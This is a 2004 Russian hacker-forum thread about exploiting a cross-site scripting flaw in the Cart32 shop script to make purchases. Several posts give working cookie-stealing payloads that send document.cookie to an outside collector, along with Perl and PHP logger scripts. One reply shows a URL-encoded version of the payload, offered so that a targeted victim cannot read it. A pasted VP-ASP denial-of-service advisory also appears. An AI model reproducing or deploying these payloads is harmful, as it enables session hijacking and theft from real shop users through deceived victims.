Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Shop (https://forum.antichat.xyz/showthread.php?t=2723)

PUMA 15.09.2004 15:46

как реальзовать данную уязвимость шопа
scripts/cart32.exe/GetLatestBuilds?cart32=<script&gt;alert('XSS')&lt;/script&gt;
для получения полезного

JazzzSummerMan 16.09.2004 12:36

Дай полный адрес

Че Гевара 16.09.2004 17:54

PUMA, а смысл использовать xss, если это подействует только на тебя ?

PUMA 16.09.2004 20:52

стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...

Algol 17.09.2004 12:25

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 15 2004,15:46)</td></tr><tr><td id="QUOTE">scripts/cart32.exe/GetLatestBuilds?cart32=<script&gt;alert('XSS&#39http://forum.antichat.ru/iB_html/non...icons/wink.gif&lt;/script&gt;[/QUOTE]<span id='postcolor'>
По-моему от таких уязвимостей толку - ноль...
Этот скрипт срабатывает только у того, кто отправил данный запрос... Какой в этом смысл ?

JazzzSummerMan 17.09.2004 14:23

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 16 2004,20:52)</td></tr><tr><td id="QUOTE">стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...[/QUOTE]<span id='postcolor'>
Да))) Баг действительно нераспространенный) Скажу больше, это даже не баг фактически. Скрывай его дальше
Потом продашь кому-нибудь.
Ну а если по существу, можно конечно найти этому применение, только вероятность совсем невелика. Тем более, чтобы найти уязвимость, нужно хотя бы сами куки для начала посмотреть, и личный кабинет юзера, поэтому и спрашивал полный УРЛ

PUMA 20.09.2004 02:59

ну вот можно купить чтонибудь ///

а вот ещё один ктонибудь сможет реализовать ?

VP-ASP 'shoprestoreorder.asp' May Let Remote Users Keep Database Connections Open
A denial of service vulnerability was reported in VP-ASP. A remote user can consume database resources on the target system.

The vendor reported that a remote user can restore a previous order using 'shoprestoreorder.asp' to potentially cause a database connection to stay open. The vendor indicates that this can cause performance issues.

Impact: &nbsp;A remote user may be able to cause database connections to stay open.

Solution: &nbsp;The vendor has described a fix for 'shoprestoreorder.asp':

acidhack 09.10.2004 04:42

А если по-думать головой?

<script&gt;document.location.href='http://target.com/cgi-bin/cookie.cgi?' + document.cookie;&lt;/script&gt;

(cookie.cgi)
#!/usr/bin/perl -w

open COOKIES,&quot;&gt;&gt;../cookies.txt&quot;;

print &quot;Content-Type: text/html\n\n&quot;;
print COOKIES &quot;----------- new cookie -----------\n&quot;;
print COOKIES &quot;$ENV{'QUERY_STRING'}\n&quot;;
print COOKIES &quot;---------- end of cookie ---------\n\n&quot;;

close COOKIES;

http://forum.antichat.ru/iB_html/non...cons/devil.gif

Че Гевара 09.10.2004 18:47

acidhack, это примитивный вариант скрипта снифера ... Лучше использовать наш ... Да и не факт, что кукисы будут полезны ...

PEPSICOLA 06.11.2004 09:13

acidhack - Мне типа слово &quot;COOKIES&quot; напоминает кучку маленьких пирожков &nbsp;http://forum.antichat.ru/iB_html/non...ns/biggrin.gif

Trinux 26.11.2004 10:34

О! круто! Я догнал!!! А можно сделать так?

www.xxx.ru/?search=<script>document.images[0].src='http://www.yyy.ru/?с'+document.cookie;</script>

А в http://www.yyy.ru/ написать что-то типа
PHP код:

<?
$u_ip
=htmlspecialchars(getenv("REMOTE_ADDR"), ENT_QUOTES);
$u_agent=htmlspecialchars(getenv("HTTP_USER_AGENT"), ENT_QUOTES);
$u_ref=htmlspecialchars(getenv("HTTP_REFERER"), ENT_QUOTES);
$u_cookie=htmlspecialchars($cENT_QUOTES);
mysql_unbuffered_query("INSERT INTO table VALUES('', '$u_ip', '$u_agent', '$u_ref', '$u_cookie')") or die();

header("Content-type: image/png");
$im=imagecreate(100100);
$bgcolor=imagecolorallocate($im255255255);
$tcolor=imagecolorallocate($im2331491);
imagestring($im155,  "Hackered"$tcolor);
imagepng($im);
imagedestroy($im);
?>

Кинуть ламаку, типа на, погляди, я сайт ломанул, по идее его кука с этого сайта мне в БД, а он вместо первой картини сайта видит имагу 100 на 100 с надписью "Hackered", круто! Но есть одно но. Если он не такой и ламак, то перед тем как вставит код в браузер, проглядит его. Думаю его смутит строчка
http://www.yyy.ru/?с'+document.cookie... Что тогда делать? Ыдь у нас java-inj, помойму можно как-то зашифровать весь скрипт, типа чтоб нельзя бло увидеть код скрипта, чтоб были одни кракозяборы... Круто!!! Блин помогите, будет ли ваще все это вашенаписанное работать, и если да, то как зашифровать строку? Ребят, респект =)

Algol 26.11.2004 15:15

Код:

xxx.ru/?search=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%69%6D%61%67%65%73%5B%30%5D%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%79%79%2E%72%75%2F%3F%F1%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
(без пробелов - их форум автоматически вставляет)

Trinux 26.11.2004 18:52

АААА =)))) че то до меня сразу то не дошло =))) все равно спасибо.


Время: 18:20